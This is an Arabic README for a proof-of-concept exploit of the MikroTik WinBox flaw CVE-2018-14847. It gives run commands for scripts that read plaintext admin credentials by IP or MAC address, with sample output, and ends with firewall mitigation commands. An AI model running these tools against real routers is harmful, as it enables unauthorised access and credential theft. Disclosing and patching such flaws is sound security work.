
هذا دليل إثبات المفهوم للثغرة الحرجة في WinBox (CVE-2018-14847) والتي تسمح بقراءة عشوائية للملفات التي تحتوي على كلمات مرور نصية واضحة. لقد تم إصلاح الثغرة منذ فترة طويلة، لذلك انتهى هذا المشروع ولن يتم دعمه أو تحديثه بعد الآن. يمكنك عمل fork له وتحديثه بنفسك بدلاً من ذلك.
هذا هو دليل على المفهوم للثغرة الحرجة في WinBox (CVE-2018-14847) التي تسمح بقراءة عشوائية للملفات لكلمات المرور النصية العادية.
تم إصلاح الثغرة منذ فترة طويلة، لذلك انتهى هذا المشروع ولن يتم دعمه أو تحديثه بعد الآن. يمكنك عمل fork له وتحديثه بنفسك بدلاً من ذلك.
https://n0p.me/winbox-bug-dissection/
هذا السكريبت لن يعمل مع Python 2.x أو الإصدارات الأقل.
يتم استخدام السكريبت ببساطة مع وسائط بسيطة في سطر الأوامر.
استغل الثغرة واقرأ كلمة المرور.
python3 WinboxExploit.py <IP-ADDRESS> [PORT]
مثال:
$ python3 WinboxExploit.py 172.17.17.17
Connected to 172.17.17.17:8291
Exploit successful
User: admin
Pass: Th3P4ssWord
يمكنك استخراج الملفات حتى إذا كان الجهاز لا يملك عنوان IP.
فحص اكتشاف بسيط لأجهزة Mikrotik المتصلة محليًا.
python3 MACServerDiscover.py
مثال:
$ python3 MACServerDiscover.py
Looking for Mikrotik devices (MAC servers)
aa:bb:cc:dd:ee:ff
aa:bb:cc:dd:ee:aa
استغل الثغرة واقرأ كلمة المرور.
python3 MACServerExploit.py <MAC-ADDRESS>
مثال:
$ python3 MACServerExploit.py aa:bb:cc:dd:ee:ff
User: admin
Pass: Th3P4ssWord
جميع إصدارات RouterOS من 2015-05-28 إلى 2018-04-20 معرضة لهذا الاستغلال.
أجهزة Mikrotik التي تعمل بإصدارات RouterOS:
لمزيد من المعلومات انظر: https://blog.mikrotik.com/security/winbox-vulnerability.html
/ip service set winbox address=10.0.0.0/8,172.16.0.0/12,192.168.0.0/16
/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
/tool mac-server mac-winbox